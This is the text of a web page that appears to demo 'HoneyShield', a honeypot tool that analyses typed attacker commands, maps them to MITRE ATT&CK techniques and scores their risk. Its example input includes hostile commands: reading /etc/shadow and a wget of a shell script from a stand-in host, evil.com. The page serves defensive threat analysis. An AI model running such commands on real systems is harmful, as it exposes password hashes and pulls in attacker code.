🍯 HoneyShield — Online Interactive Demo

Type attacker commands below and see real-time intelligence analyse

Input — Attacker Commands

Type the commands an attacker would run (one per line and Analyse). Example:
id
cat /etc/shadow
wget http://evil.com/shell.sh

📊 Attack Statistics

0
Commands
Risk Level
0
MITRE TTPs
0
Threat Tags

Risk Score

Attacker Profile

🎯 Attack Chain Detection

Select commands and click "Analyze Attack" to see detected chain

🛡️ MITRE ATT&CK Techniques Mapped

No commands analyzed yet

⚠️ Threat Intent Tags

No threats detected

📋 Session Timeline

Timeline will appear here